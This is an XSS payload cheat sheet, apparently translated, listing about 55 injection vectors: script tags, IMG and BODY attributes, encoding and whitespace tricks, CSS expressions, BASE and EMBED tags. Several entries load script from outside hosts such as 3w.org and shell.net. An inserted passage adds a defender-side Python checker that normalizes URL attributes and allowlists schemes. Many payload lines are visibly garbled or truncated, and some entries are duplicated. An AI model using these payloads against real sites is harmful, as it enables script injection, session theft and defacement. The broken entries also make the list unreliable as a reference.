(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (only Firefox and similar browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
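Items 3 to 15, 17 and 47 all exploit the same gap: the browser decodes character references (with or without the trailing semicolon), ignores the case of the scheme, and drops null bytes, tabs, newlines and a range of whitespace code points before it reads the scheme of a URL-valued attribute, so a filter that searches for the literal string "javascript:" never sees it. The following is an added defender-side example, not part of the original cheat sheet: it normalizes an attribute value roughly the way a browser does and then checks the scheme against an allowlist. The SAFE_SCHEMES set, the stripped character ranges and the sample inputs are all constructed for this example.

```python
import html
import re
from typing import List, Optional, Tuple

# Code points to drop before looking at the scheme: ASCII controls and space,
# NBSP, the U+2000 block of spaces, ideographic space and the BOM. This set is
# a constructed approximation of the ranges item 47 lists, not a browser spec.
_IGNORED = re.compile(r"[\x00-\x20\xa0\u2000-\u200b\u3000\ufeff]")

# Allowlist: anything else (javascript:, vbscript:, data:, ...) is rejected.
# Assumption for this example; tune it to what the application actually needs.
SAFE_SCHEMES = {"http", "https", "mailto"}

_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")


def normalize_url_attr(value: str) -> str:
    """Approximate what a browser sees for an attribute value.

    html.unescape follows the HTML5 rules, so &#106; and the semicolon-less
    &#106 both become 'j'; the regex then removes the characters browsers
    skip inside a scheme (tabs, newlines, NULs and the ranges above).
    """
    return _IGNORED.sub("", html.unescape(value))


def url_scheme(value: str) -> Optional[str]:
    """Return the lower-cased scheme of the normalized value, or None if relative."""
    m = _SCHEME.match(normalize_url_attr(value))
    return m.group(1).lower() if m else None


def is_safe_url(value: str) -> bool:
    """True when the value is relative or its scheme is on the allowlist."""
    scheme = url_scheme(value)
    return scheme is None or scheme in SAFE_SCHEMES


# Constructed inputs that mirror the evasion styles above (not the page's payloads).
SAMPLES: List[str] = [
    "JaVaScRiPt:alert(1)",                                                  # item 4: case games
    "jav&#x09;ascript:alert(1)",                                            # items 11-12: encoded tab
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)",  # item 5: entities
    "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(1)",            # item 9: no semicolons
    "java\x00script:alert(1)",                                              # item 17: NUL byte
    "\u2003javascript:alert(1)",                                            # item 47: U+2003 em space
    " https://example.com/a.png",                                           # legitimate, leading space
    "/images/logo.png",                                                     # legitimate, relative
]


def check_samples() -> List[Tuple[str, Optional[str], bool]]:
    """Run every sample through the checker; returns (input, scheme, allowed)."""
    return [(s, url_scheme(s), is_safe_url(s)) for s in SAMPLES]


if __name__ == "__main__":
    for raw, scheme, ok in check_samples():
        print(f"{'ALLOW ' if ok else 'REJECT'} scheme={scheme!r:<14} {raw!r}")
```

This check only covers attributes whose whole value is a URL (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC). For item 41 the URL is embedded in a META refresh CONTENT value, and for items 46 to 53 it sits inside a CSS url() or expression(), so those contexts need their own extraction step before the same normalization applies; the robust defence against the tag-based vectors remains an HTML sanitizer with an element and attribute allowlist together with context-appropriate output encoding.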
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>